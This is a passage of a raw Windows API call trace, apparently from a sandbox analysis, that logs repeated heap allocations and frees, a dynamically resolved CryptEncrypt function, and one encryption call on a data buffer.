(HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d28 [0212.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0212.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0212.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0212.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0212.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab278 | out: hHeap=0x2af0000) returned 1 [0212.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0212.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0212.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0212.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0212.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0212.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab248 [0212.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d18 [0212.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab278 [0212.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0212.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2a8 [0212.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c78 [0212.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0212.243] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0212.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0212.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c78 [0212.243] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0212.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0212.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0212.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2d8 | out: hHeap=0x2af0000) returned 1 [0212.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2d8 [0212.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c78 [0212.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0212.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0212.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d18 [0212.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6b0 [0212.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0212.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0212.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c78 [0212.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0212.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab608 [0212.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d68 [0212.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0212.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0212.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0212.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab608 | out: hHeap=0x2af0000) returned 1 [0212.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0212.244] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0212.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab518 [0212.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d18 [0212.244] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab668 [0212.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0212.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0212.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0212.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0212.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0212.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0212.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0212.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0212.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6c8 [0212.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0212.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0212.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c78 [0212.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0212.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0212.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0212.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0212.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0212.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0212.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0212.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0212.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0212.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0212.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d18 [0212.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0212.245] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0212.245] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0212.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d18 [0212.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7020 [0212.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69af0 [0212.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab680 [0212.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c78 [0212.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0212.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5d8 [0212.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0212.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0212.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0212.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0212.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0212.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0212.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5f0 [0212.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d18 [0212.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d68 [0212.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1d60) returned 0x2a8bea8 [0212.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0212.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a8bea8 | out: hHeap=0x2af0000) returned 1 [0212.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0212.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5f0 | out: hHeap=0x2af0000) returned 1 [0212.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0212.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0212.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab608 [0212.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0212.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0212.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0212.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x29f7878 [0212.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0212.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab548 [0212.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d18 [0212.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0212.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0212.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0212.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7100 [0212.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69700 [0212.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5f0 [0212.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d28 [0212.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0212.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5f0 | out: hHeap=0x2af0000) returned 1 [0212.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0212.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69700 | out: hHeap=0x2af0000) returned 1 [0212.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0212.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0212.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0212.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0212.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ca8 [0212.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0212.247] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0212.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0212.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d28 [0212.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d18 [0212.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0212.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0212.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0212.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0212.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0212.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0212.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d18 [0212.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5f0 [0212.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d28 [0212.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d58 [0212.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0212.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5f0 | out: hHeap=0x2af0000) returned 1 [0212.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0212.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0212.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0212.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d28 [0212.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0212.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d58 [0212.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d68 [0212.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0212.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0212.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0212.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0212.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0212.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d58 [0212.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0212.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d68 [0212.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0212.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0212.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0212.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0212.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0212.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0212.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0212.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5f0 [0212.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d68 [0212.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0212.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0212.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5f0 | out: hHeap=0x2af0000) returned 1 [0212.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0212.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0212.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0212.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0212.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0212.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d68 [0212.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5f0 [0212.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0212.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bb8 [0212.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0212.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5f0 | out: hHeap=0x2af0000) returned 1 [0212.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0212.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0212.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0212.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0212.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0212.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bb8 [0212.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ec8 [0212.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5f0 [0212.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0212.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0212.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5f0 | out: hHeap=0x2af0000) returned 1 [0212.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0212.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71de8 [0212.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5f0 [0212.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71e88 [0212.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71f88 [0212.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0212.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5f0 | out: hHeap=0x2af0000) returned 1 [0212.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0212.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0212.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0212.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0212.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ea8 [0212.250] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0212.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xd) returned 0x2aab5f0 [0212.250] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab5f0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0212.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5f0 | out: hHeap=0x2af0000) returned 1 [0212.251] GetProcAddress (hModule=0x76390000, lpProcName="CryptEncrypt") returned 0x763c2cf0 [0212.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0212.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0212.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1c) returned 0x2a780e8 [0212.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71db8 [0212.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71e88 [0212.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ea8 [0212.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71eb8 [0212.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ec8 [0212.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71f88 [0212.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71fe8 [0212.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0212.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0212.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0212.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0212.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0212.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0212.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0212.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0212.251] CryptEncrypt (in: hKey=0x9e21f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a8a138*, pdwDataLen=0x8cef60*=0x1d60, dwBufLen=0x1d68 | out: pbData=0x2a8a138*, pdwDataLen=0x8cef60*=0x1d68) returned 1 [0212.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3865f58 [0212.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0212.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71fe8 [0212.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5f0 [0212.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0212.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0212.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72028 [0212.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0212.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0212.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0212.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0212.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0212.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0212.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0212.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0212.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0212.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 